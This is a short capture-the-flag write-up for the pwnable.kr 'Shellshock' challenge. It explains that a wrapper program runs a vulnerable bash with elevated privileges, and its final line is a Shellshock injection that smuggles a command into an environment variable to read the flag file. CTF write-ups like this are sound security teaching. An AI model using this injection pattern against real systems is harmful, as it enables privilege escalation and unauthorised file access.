# 10 - Shellshock

## The Challenge

Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)

ssh <shellshock@pwnable.kr> -p2222 (pw:guest)

## The Solution

Let's look at the files.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2Fsync%2Fd4f52bffaeadd9d9bf346165d2b96a5d0f588cab.png?generation=1600607684609298\&alt=media)

What is the purpose of this bash binary?

The binary is running with shellshock\_pwns privileges. What is it doing?

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2Fsync%2F45e471682c43b6346f914e12d34a2c199e63ce48.png?generation=1600607690515720\&alt=media)

It runs the bash binry with shellshock\_pwns privileges. what's so special about that bash? As the name of the challenge suggests, this bash is vulnerable to [shellshock](https://en.wikipedia.org/wiki/Shellshock_\(software_bug\)).

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2Fsync%2Feaf52edb92bcc669d974fa215348bd7575ffdd67.png?generation=1600607688634735\&alt=media)

Here is the solution for ya'll:

```
env x='() { :;}; /bin/cat flag' ./shellshock
```